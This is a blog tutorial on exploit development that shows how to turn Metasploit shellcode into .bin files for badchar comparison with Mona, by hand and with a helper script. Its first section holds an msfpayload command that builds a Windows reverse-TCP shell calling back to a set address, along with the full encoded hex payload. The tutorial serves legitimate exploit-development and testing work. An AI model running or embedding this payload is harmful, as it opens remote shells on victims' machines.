Writing shellcode to binary files

I have been doing allot of exploit development recently. The g00ns out there with some exploits under their belt know one of the biggest obstacles in the development process are the badchars. Thank god for us corelanc0d3r has developed some tools which enable us to do rapid reliable exploit development (big shout-out to the corelan team!!). One of the features of Mona and Pvefindaddr is the ability to compare shellcode in memory with the original version (byte per byte). Hence if there are any mangled bytes in memory we can easily flag them as badchars and re-encode our payload. To perform this analysis we need to store the original version of our shellcode in a binary file. This tutorial will walk you through that process. First we will do things “The Hard/Tedious Way” and then I’ll show you a small script I made to do things ”The Easy Way”. Let’s get to it!!

For the purpose of this tutorial I’ll be working with Windows PE files (Portable Executable) however these techniques work with other fileformat payloads (such as pdf’s) so use your imagination. I’ll also be using a high-end Antivirus (ESET Smart Security 5, none of that AVG bull!#*t hehe), updated with the latest virus signature database.

(1) The Hard Way

First we need some sample shellcode. You can use shellcode from a pre-existing exploit or generate some with the metasploit framework. For the purpose of this tutorial we’ll be generating it with msf and writing it to a text file…

root@bt:~/Desktop# msfpayload windows/shell/reverse_tcp LHOST=192.168.98.64 LPORT=9988 R |msfencode -e 
x86/alpha_mixed -b "\x00" -t c >> test.txt

[*] x86/alpha_mixed succeeded with size 642 (iteration=1)

 

 

 

 

 

 

 

 

 

As you might have guessed the current shellcode format is not suitable for our purposes. Let’s try to fix that with some cat-grep-tr-sed kung-fu. We will need to transform the format of our shellcode from this “\x89\xe5\xdb” to this “89e5db". This magic might need some clarification. (1) With grep we filter out only the lines that contain ”(2) tr -d” removes all whitespaces (3) tr -d ”\n” removes all new lines (4) sed deletes several characters (\"x;). The result is a clean output of the raw hex-bytes.

root@bt:~/Desktop# cat test.txt |grep '"' |tr -d " " |tr -d "\n" |sed 's/[\"x;]//g' 89e5dbdad975f45f57594949494949494949494943434343434337515a6a415850304130416b414151324142324242304242414258 50384142754a49496c79786e6935505770655055306d5939757031385252444e6b663230304c4b6272344c6c4b614272344e6b7072 6578766f6837337a45765031596f54716b706e4c656c3171516c6662364c713049517a6f566d33314a676b526870314266376c4b50 5232306e6b4262756c677158506c4b473071686e6549506434626a66616e3046304e6b526846786e6b63684750477159434b53774c 52694c4b70344c4b333138563561396f647149504e4c79515a6f444d56616f3745684d30343548746773734d6a58456b534d664443 454a4262784e6b5638613437714a7352464e6b744c626b4c4b7058576c33315a736c4b55546e6b45517a704b39626466446644614b 314b75313369505a4271696f6b503148514f505a6c4b77627a4b4d56336d653847435652555057705068316733435742314f327442 48526c5077475663374b4f48554c784a306661655047704469595446345270553866496b30706b7550496f69454630563070505630 51507270637070503068697a566f794f4b506b4f69456c57524a533562484950793850623730506876625330457757746d59786630 6a46705146514765384a394d7561645171696f69454c454b706254544c496f726e666872555a4c33584c304c7549325146496f6945 324a6770517a3444714630576178377258597a68436f6b4f4e356e6b7036624a5370753843303230455067705276706a3550735830 586c6452733865396f58554e737273335a6770736651437367706864426e397a68736f396f7a7547716b7331394a664e6548767165 7a4c48434141

 

So far so good let’s create a template binary file by echoing some rubbish into it. After that we can open it in hexeditor for further manipulation.

root@bt:~/Desktop# echo "boring" >> template.bin

root@bt:~/Desktop# hexeditor -b template.bin

 

 

 

 

 

 

 

 

 

Now we need to add space for our shellcode, hold down “Ctrl-a” to insert empty space (be sure to add enough don’t worry if it’s too much). Copy the buffer we created above and paste it into the empty space with ”Shift-Insert”. After that is done delete the excess space and the junk we echoed into the binary file. You can see these three phases in the screenshots below.

 

 

 

 

 

 

 

 

 

All that remains now is to press “Ctrl-x” to close and save the binary file. That’s all there is to it. While this isn’t really hard it is certainly tedious, especially if we have to redo this process several times.


(2) The Easy Way

I thought to myself why waste two minutes of my life each time I have to create a *.bin file.  After a bit of research I created a small script to do all the work for me. Just execute the script without any parameters to see the menu. You can download it from the coding page.

root@bt:~/Desktop# ./bin.sh
--------------------------------------------------------------------
|                          Bin v1.0 ~ b33f                         |
|                  -Convert you shellcode to *.bin-                |
--------------------------------------------------------------------
| USAGE: ./bin.sh -i [Input File] -o [Output File] -t [B/Z]        |
|                                                                  |
| REQUIRED                                                         |
|         -i  Input (text) file containing the shellcode.          |
|         -o  Output filename without extention (eg: shell).       |
|         -t  Type can be B (regular bin file) or Z (zipped.       |
|             bin file).                                           |
|                                                                  |
| DETAILS                                                          |
|         The input text file should just contain the shellcode.   |
|         If you are using msfpayload (possibly/probably in        |
|         combinatione with msfencode) set the output type to      |
|         c or perl. If you have some shellcode in an exploit      |
|         just copy it to a text file...                           |
--------------------------------------------------------------------

 

The script has some error tolerance for sloppy-copy use. It should filter out junk characters when copying from most common exploits formats (python, perl, c). When using msfpayload/msfencode you can set the output type to perl or c. Feel free to add some rules for filtering (email me if you have any suggestions). The rule of thumb is to copy as cleanly as possible and check the contents of the binary file. I also added an option to zip the resulting binary file, the reason for this is that I usually transfer files to my debugging machine with an apache server and internet explorer doesn’t like binary files much.


Time for a demonstration!! For the sake of diversity I’ll be using some shellcode from an exploit I developed recently. First I copy the shellcode into a text file (badchars.txt). See the screenshots below, take notice that my sloppy-copy doesn't affect the script…

 

 

 

 

 

 

 

 

 

All that’s left to do is run the script and check out the results in the hexeditor. Enjoy all those precious minutes you’ll be saving every time you develop an exploit ;))…